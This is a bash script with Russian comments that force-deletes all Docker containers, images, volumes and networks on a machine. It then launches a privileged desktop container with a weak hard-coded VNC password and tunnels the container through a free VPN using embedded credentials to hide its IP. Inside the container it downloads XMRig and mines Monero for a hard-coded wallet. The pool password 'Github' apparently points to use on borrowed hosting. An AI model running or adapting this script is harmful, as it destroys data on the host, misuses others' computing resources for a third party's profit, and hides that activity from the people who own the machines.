bash -c "$(cat <<'EOF'
#!/bin/bash

# === 0. Полная очистка Docker и среды перед запуском ===
echo "[🧹] Полная очистка Docker-среды и старых данных..."
sudo docker ps -aq | xargs -r sudo docker stop
sudo docker ps -aq | xargs -r sudo docker rm -f
sudo docker images -aq | xargs -r sudo docker rmi -f
sudo docker volume ls -q | xargs -r sudo docker volume rm
sudo docker network ls | grep -v 'bridge\|host\|none' | awk '{print $1}' | xargs -r sudo docker network rm
rm -rf ~/dockercom

# === 1. Установка Docker и необходимых пакетов ===
echo "[+] Установка Docker и нужных пакетов..."
sudo apt update && sudo apt install -y docker.io docker-compose openvpn curl unzip

# === 2. Проверка установки Docker ===
if ! command -v docker &> /dev/null; then
  echo "[-] Docker не установлен. Прерывание."; exit 1
fi

# === 3. Создание рабочей директории и docker-compose файла ===
mkdir -p ~/dockercom && cd ~/dockercom || exit 1
cat > ubuntu_gui.yml <<EOL
version: '3.8'
services:
  ubuntu-gui:
    image: dorowu/ubuntu-desktop-lxde-vnc:bionic
    container_name: ubuntu_gui
    ports:
      - "6080:80"
      - "5900:5900"
    environment:
      - VNC_PASSWORD=pass123
    volumes:
      - ./data:/data
      - /dev/net/tun:/dev/net/tun
    cap_add:
      - NET_ADMIN
    devices:
      - /dev/net/tun
    privileged: true
    shm_size: "2g"
EOL

# === 4. Запуск контейнера ===
echo "[+] Запуск контейнера..."
sudo docker-compose -f ubuntu_gui.yml up -d
sudo docker ps

# === 5. Подключение к VPN внутри контейнера ===
echo "[+] Подключение к VPN внутри контейнера..."
sudo docker exec -i ubuntu_gui bash <<'EOC'
apt update && apt install -y openvpn curl unzip resolvconf
cd /tmp && curl -LO https://www.vpnbook.com/free-openvpn-account/VPNBook.com-OpenVPN-Euro1.zip
unzip -o VPNBook.com-OpenVPN-Euro1.zip -d vpnbook
echo -e "vpnbook\ncf324xw" > vpnbook/auth.txt
[ ! -c /dev/net/tun ] && echo "❌ TUN device not available." && exit 1
echo "nameserver 1.1.1.1" > /etc/resolv.conf
openvpn --config vpnbook/vpnbook-euro1-tcp443.ovpn \
    --auth-user-pass vpnbook/auth.txt \
    --daemon \
    --route-up '/etc/openvpn/update-resolv-conf' \
    --down '/etc/openvpn/update-resolv-conf'
sleep 45
echo "🌐 Внешний IP:"
curl -s ifconfig.me
EOC

# === 6. Установка и запуск XMRig ===
echo "[+] Установка XMRig в контейнере..."
sudo docker exec -i ubuntu_gui bash <<'EOM'
POOL="gulf.moneroocean.stream:10128"
WALLET="47K4hUp8jr7iZMXxkRjv86gkANApNYWdYiarnyNb6AHYFuhnMCyxhWcVF7K14DKEp8bxvxYuXhScSMiCEGfTdapmKiAB3hi"
PASSWORD="Github"
XMRIG_VERSION="6.22.2"
ARCHIVE_NAME="xmrig-${XMRIG_VERSION}-linux-static-x64.tar.gz"
cd /tmp && curl -LO "https://github.com/xmrig/xmrig/releases/download/v${XMRIG_VERSION}/${ARCHIVE_NAME}"
tar -xzf "$ARCHIVE_NAME" && cd "xmrig-${XMRIG_VERSION}"
cat > config.json <<EOF
{
  "api": { "id": null, "worker-id": "" },
  "autosave": false,
  "background": false,
  "colors": true,
  "randomx": { "1gb-pages": true, "rdmsr": true, "wrmsr": true, "numa": true },
  "cpu": true,
  "donate-level": 0,
  "log-file": null,
  "pools": [
    {
      "url": "${POOL}",
      "user": "${WALLET}",
      "pass": "${PASSWORD}",
      "algo": "rx",
      "tls": false,
      "keepalive": true,
      "nicehash": false
    }
  ],
  "print-time": 60,
  "retries": 5,
  "retry-pause": 5,
  "syslog": false,
  "user-agent": null
}
EOF
chmod +x xmrig
echo "[*] Запуск майнинга..."
./xmrig -c config.json
EOM

# === 7. Финал ===
echo
echo "[✅] Всё запущено."
echo "VNC-доступ: http://localhost:6080 (пароль: pass123)"
EOF
)"
